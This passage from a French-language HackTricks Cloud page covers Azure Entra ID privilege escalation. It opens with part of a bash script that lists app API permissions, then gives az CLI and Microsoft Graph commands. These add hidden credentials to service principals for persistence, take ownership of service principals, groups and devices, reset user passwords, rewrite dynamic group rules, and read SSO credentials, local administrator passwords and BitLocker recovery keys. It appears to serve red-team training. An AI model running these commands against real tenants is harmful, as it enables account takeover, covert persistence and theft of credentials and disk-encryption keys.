Known Microsoft first-party owner organization IDs.

MICROSOFT_OWNER_ORG_IDS=( “f8cdef31-a31e-4b4a-93e4-5f571e91255a” “72f988bf-86f1-41af-91ab-2d7cd011db47” )

is_microsoft_owner() { local owner=“$1” local id for id in “${MICROSOFT_OWNER_ORG_IDS[@]}”; do if [ “$owner” = “$id” ]; then return 0 fi done return 1 }

get_permission_value() { local resource_app_id=“$1” local perm_type=“$2” local perm_id=“$3” local key value key=“${resource_app_id}|${perm_type}|${perm_id}”

value=“$(awk -F ‘\t’ -v k=”$key“ ‘$1==k {print $2; exit}’ “$tmp_perm_cache”)“ if [ -n “$value” ]; then printf ‘%s\n’ “$value” return 0 fi

if [ “$perm_type” = “Scope” ]; then value=“$(az ad sp show –id “$resource_app_id” –query “oauth2PermissionScopes[?id==‘$perm_id’].value | [0]” -o tsv 2>/dev/null || true)“ elif [ “$perm_type” = “Role” ]; then value=“$(az ad sp show –id “$resource_app_id” –query “appRoles[?id==‘$perm_id’].value | [0]” -o tsv 2>/dev/null || true)“ else value=“” fi

[ -n “$value” ] || value=“UNKNOWN” printf ‘%s\t%s\n’ “$key” “$value” >> “$tmp_perm_cache” printf ‘%s\n’ “$value” }

command -v az >/dev/null 2>&1 || { echo “az CLI not found” >&2; exit 1; } command -v jq >/dev/null 2>&1 || { echo “jq not found” >&2; exit 1; } az account show >/dev/null

apps_json=“$(az ad app list –all –query ‘[?length(requiredResourceAccess) > 0].[displayName,appId,requiredResourceAccess]’ -o json)”

tmp_map=“$(mktemp)” tmp_ids=“$(mktemp)” tmp_perm_cache=“$(mktemp)” trap ‘rm -f “$tmp_map” “$tmp_ids” “$tmp_perm_cache”’ EXIT

Build unique resourceAppId values used by applications.

jq -r ‘.[][2][]?.resourceAppId’ <<<“$apps_json” | sort -u > “$tmp_ids”

Resolve resourceAppId -> owner organization + API display name.

while IFS= read -r rid; do [ -n “$rid” ] || continue sp_json=“$(az ad sp show –id “$rid” –query ‘{owner:appOwnerOrganizationId,name:displayName}’ -o json 2>/dev/null || true)“ owner=“$(jq -r ‘.owner // “UNKNOWN”’ <<<“$sp_json”)“ name=“$(jq -r ‘.name // “UNKNOWN”’ <<<“$sp_json”)“ printf ‘%s\t%s\t%s\n’ “$rid” “$owner” “$name” >> “$tmp_map” done < “$tmp_ids”

echo -e “appDisplayName\tappId\tresourceApiDisplayName\tresourceAppId\tisMicrosoft\tpermissions”

Print all app API permissions and mark if the target API is Microsoft-owned.

while IFS= read -r row; do app_name=“$(jq -r ‘.[0]’ <<<”$row“)“ app_id=“$(jq -r ‘.[1]’ <<<”$row“)“

while IFS= read -r rra; do resource_app_id=“$(jq -r ‘.resourceAppId’ <<<”$rra“)“ map_line=“$(awk -F ‘\t’ -v id=”$resource_app_id“ ‘$1==id {print; exit}’ “$tmp_map”)“ owner_org=“$(awk -F’\t’ ‘{print $2}’ <<<”$map_line“)“ resource_name=“$(awk -F’\t’ ‘{print $3}’ <<<”$map_line“)“

[ -n “$owner_org” ] || owner_org=“UNKNOWN” [ -n “$resource_name” ] || resource_name=“UNKNOWN”

if is_microsoft_owner “$owner_org”; then is_ms=“true” else is_ms=“false” fi

permissions_csv=“” while IFS= read -r access; do perm_type=“$(jq -r ‘.type’ <<<”$access“)“ perm_id=“$(jq -r ‘.id’ <<<”$access“)“ perm_value=“$(get_permission_value “$resource_app_id” “$perm_type” “$perm_id”)“ perm_label=“${perm_type}:${perm_value}” if [ -z “$permissions_csv” ]; then permissions_csv=“$perm_label” else permissions_csv=“${permissions_csv},${perm_label}” fi done < <(jq -c ‘.resourceAccess[]’ <<<“$rra”)

echo -e “${app_name}\t${app_id}\t${resource_name}\t${resource_app_id}\t${is_ms}\t${permissions_csv}” done < <(jq -c ‘.[2][]’ <<<“$row”) done < <(jq -c ‘.[]’ <<<“$apps_json”)

</details>

## Service Principals

### `microsoft.directory/servicePrincipals/credentials/update`

Ceci permet à un attacker d'ajouter des credentials aux service principals existants. Si le service principal dispose de privilèges élevés, l'attacker peut assumer ces privilèges.
```bash
az ad sp credential reset --id <sp-id> --append

Caution

Le nouveau mot de passe généré n’apparaîtra pas dans la console web, donc cela peut être un moyen discret de maintenir une persistance sur un service principal.
Depuis l’API, ils peuvent être trouvés avec : az ad sp list --query '[?length(keyCredentials) > 0 || length(passwordCredentials) > 0].[displayName, appId, keyCredentials, passwordCredentials]' -o json

Si vous obtenez l’erreur "code":"CannotUpdateLockedServicePrincipalProperty","message":"Property passwordCredentials is invalid." c’est parce que il n’est pas possible de modifier la propriété passwordCredentials du SP et vous devez d’abord la déverrouiller. Pour cela, vous avez besoin d’une permission (microsoft.directory/applications/allProperties/update) qui vous permet d’exécuter :

az rest --method PATCH --url https://graph.microsoft.com/v1.0/applications/<sp-object-id> --body '{"servicePrincipalLockConfiguration": null}'

microsoft.directory/servicePrincipals/synchronizationCredentials/manage

Cela permet à un attacker d’ajouter des credentials à des service principals existants. Si le service principal dispose de privilèges élevés, l’attacker peut assumer ces privilèges.

az ad sp credential reset --id <sp-id> --append

microsoft.directory/servicePrincipals/owners/update

De la même manière que pour les applications, cette permission permet d’ajouter davantage de propriétaires à un service principal. Posséder un service principal permet de contrôler ses identifiants et ses autorisations.

# Add new owner
spId="<spId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$spId/owners/\$ref" \
--headers "Content-Type=application/json" \
--body "{
\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"
}"

az ad sp credential reset --id <sp-id> --append

# You can check the owners with
az ad sp owner list --id <spId>

Caution

Après avoir ajouté un nouveau propriétaire, j’ai essayé de le supprimer mais l’API a répondu que la méthode DELETE n’était pas prise en charge, même si c’est la méthode que vous devez utiliser pour supprimer le propriétaire. Donc vous ne pouvez pas supprimer les propriétaires pour l’instant.

microsoft.directory/servicePrincipals/disable and enable

Ces permissions permettent de désactiver et d’activer des service principals. Un attaquant pourrait utiliser cette permission pour activer un service principal auquel il aurait pu accéder d’une manière ou d’une autre afin d’escalader ses privilèges.

Notez que pour cette technique, l’attaquant aura besoin de permissions supplémentaires afin de prendre le contrôle du service principal activé.

# Disable
az ad sp update --id <ServicePrincipalId> --account-enabled false

# Enable
az ad sp update --id <ServicePrincipalId> --account-enabled true

microsoft.directory/servicePrincipals/getPasswordSingleSignOnCredentials & microsoft.directory/servicePrincipals/managePasswordSingleSignOnCredentials

Ces autorisations permettent de créer et d’obtenir des identifiants pour le single sign-on, ce qui pourrait permettre d’accéder à des applications tierces.

# Generate SSO creds for a user or a group
spID="<spId>"
user_or_group_id="<id>"
username="<username>"
password="<password>"
az rest --method POST \
--uri "https://graph.microsoft.com/beta/servicePrincipals/$spID/createPasswordSingleSignOnCredentials" \
--headers "Content-Type=application/json" \
--body "{\"id\": \"$user_or_group_id\", \"credentials\": [{\"fieldId\": \"param_username\", \"value\": \"$username\", \"type\": \"username\"}, {\"fieldId\": \"param_password\", \"value\": \"$password\", \"type\": \"password\"}]}"


# Get credentials of a specific credID
credID="<credID>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$credID/getPasswordSingleSignOnCredentials" \
--headers "Content-Type=application/json" \
--body "{\"id\": \"$credID\"}"

Groupes

microsoft.directory/groups/allProperties/update

Cette permission permet d’ajouter des utilisateurs à des groupes privilégiés, conduisant à une élévation de privilèges.

az ad group member add --group <GroupName> --member-id <UserId>

Remarque : Cette permission exclut les groupes assignables aux rôles Entra ID.

microsoft.directory/groups/owners/update

Cette permission permet de devenir propriétaire de groupes. Un propriétaire d’un groupe peut contrôler l’appartenance et les paramètres du groupe, ce qui peut potentiellement entraîner une élévation de privilèges au niveau du groupe.

az ad group owner add --group <GroupName> --owner-object-id <UserId>
az ad group member add --group <GroupName> --member-id <UserId>

Remarque : Cette permission exclut Entra ID role-assignable groups.

microsoft.directory/groups/members/update

Cette permission permet d’ajouter des membres à un groupe. Un attacker pourrait s’ajouter lui‑même ou ajouter des comptes malveillants à des groupes privilégiés, ce qui pourrait lui octroyer un accès privilégié.

az ad group member add --group <GroupName> --member-id <UserId>

microsoft.directory/groups/dynamicMembershipRule/update

Cette permission permet de mettre à jour la règle d’appartenance d’un groupe dynamique. Un attaquant pourrait modifier les règles dynamiques pour s’inclure lui-même dans des groupes privilégiés sans ajout explicite.

groupId="<group-id>"
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/groups/$groupId" \
--headers "Content-Type=application/json" \
--body '{
"membershipRule": "(user.otherMails -any (_ -contains \"security\")) -and (user.userType -eq \"guest\")",
"membershipRuleProcessingState": "On"
}'

Note : Cette permission exclut les groupes assignables de rôles Entra ID.

Privesc des groupes dynamiques

Il peut être possible pour des utilisateurs d’escalader leurs privilèges en modifiant leurs propres propriétés afin d’être ajoutés en tant que membres de groupes dynamiques. Pour plus d’informations, consulter :

Az - Dynamic Groups Privesc

Utilisateurs

microsoft.directory/users/password/update

Cette permission permet de réinitialiser le mot de passe d’utilisateurs non-administrateurs, permettant à un attaquant potentiel d’escalader ses privilèges vers d’autres utilisateurs. Cette permission ne peut pas être assignée aux rôles personnalisés.

az ad user update --id <user-id> --password "kweoifuh.234"

microsoft.directory/users/basic/update

Ce privilège permet de modifier les propriétés d’un utilisateur. Il est courant de trouver des groupes dynamiques qui ajoutent des utilisateurs en fonction des valeurs des propriétés ; par conséquent, cette permission pourrait permettre à un utilisateur de définir la valeur de propriété requise pour devenir membre d’un groupe dynamique spécifique et d’escalader ses privilèges.

#e.g. change manager of a user
victimUser="<userID>"
managerUser="<userID>"
az rest --method PUT \
--uri "https://graph.microsoft.com/v1.0/users/$managerUser/manager/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/users/$managerUser"}'

#e.g. change department of a user
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/users/$victimUser" \
--headers "Content-Type=application/json" \
--body "{\"department\": \"security\"}"

Conditional Access Policies & MFA bypass

Des conditional access policies mal configurées exigeant MFA peuvent être contournées — vérifiez :

Az - Conditional Access Policies & MFA Bypass

Appareils

microsoft.directory/devices/registeredOwners/update

Cette permission permet aux attackers de s’attribuer la propriété des appareils afin de prendre le contrôle ou d’accéder aux paramètres et aux données propres aux appareils.

deviceId="<deviceId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/owners/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}'

microsoft.directory/devices/registeredUsers/update

Cette permission permet aux attackers d’associer leur compte à des appareils pour obtenir l’accès ou contourner les politiques de sécurité.

deviceId="<deviceId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/registeredUsers/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}'

microsoft.directory/deviceLocalCredentials/password/read

Cette permission permet aux attaquants de lire les propriétés des credentials sauvegardés du compte administrateur local pour les appareils joints à Microsoft Entra, y compris le mot de passe

# List deviceLocalCredentials
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials"

# Get credentials
deviceLC="<deviceLCID>"
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials/$deviceLCID?\$select=credentials" \

BitlockerKeys

microsoft.directory/bitlockerKeys/key/read

Cette permission permet d’accéder aux clés BitLocker, ce qui pourrait permettre à un attaquant de décrypter des disques, compromettant la confidentialité des données.

# List recovery keys
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys"

# Get key
recoveryKeyId="<recoveryKeyId>"
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys/$recoveryKeyId?\$select=key"

Autres permissions intéressantes (À FAIRE)

• microsoft.directory/applications/permissions/update
• microsoft.directory/servicePrincipals/permissions/update
• microsoft.directory/applications.myOrganization/allProperties/update
• microsoft.directory/applications/allProperties/update
• microsoft.directory/servicePrincipals/appRoleAssignedTo/update
• microsoft.directory/applications/appRoles/update
• microsoft.directory/applications.myOrganization/permissions/update

Tip

Apprenez & pratiquez AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Soutenez HackTricks

• Consultez les subscription plans!
• Rejoignez le 💬 Discord group ou le telegram group ou suivez-nous sur Twitter 🐦 @hacktricks_live.
• Partagez des hacking tricks en soumettant des PRs aux HackTricks et HackTricks Cloud github repos.